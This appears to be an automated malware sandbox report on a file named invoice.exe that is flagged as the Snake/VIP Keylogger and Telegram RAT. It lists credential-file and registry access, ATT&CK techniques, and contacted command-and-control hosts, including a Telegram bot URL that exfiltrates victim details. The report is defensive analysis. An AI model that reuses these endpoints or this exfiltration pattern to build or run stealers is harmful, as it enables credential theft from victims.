Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	13 System Information Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	1 Query Registry	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Obfuscated Files or Information	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
invoice.exe	53%	ReversingLabs	Win32.Spyware.Snakekeylogger
invoice.exe	42%	Virustotal		Browse
invoice.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
foxwagon-equipment.com	1%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
171.39.242.20.in-addr.arpa	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
http://foxwagon-equipment.com	1%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
https://api.telegram.org/bot	2%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a	1%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=	2%	Virustotal		Browse
http://www.sakkal.com.	0%	Virustotal		Browse
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
foxwagon-equipment.com	198.54.114.247	true	true	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2001/10/2024%20/%2011:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://api.telegram.org/bot	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers?	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.use	invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.useM	invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	invoice.exe, 00000002.00000002.4138430220.000000000430F000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004337000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004589000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000044B4000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004466000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://varders.kozow.com:8081	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	invoice.exe, 00000002.00000002.4138430220.0000000004312000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004564000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004441000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000446C000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000429D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a	invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003231000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://foxwagon-equipment.com	invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037C4000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003831000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.000000000363D000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003680000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037D3000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.office.com/	invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	invoice.exe, 00000002.00000002.4138430220.000000000430F000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004337000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004589000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000044B4000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004466000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	invoice.exe	false	0%, Virustotal, Browse	unknown
http://www.carterandcone.coml	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.sakkal.com.	invoice.exe, 00000000.00000002.1713739091.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	invoice.exe, 00000002.00000002.4135565493.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.000000000325C000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.jiyu-kobo.co.jp/	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	invoice.exe, 00000002.00000002.4135565493.0000000003231000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
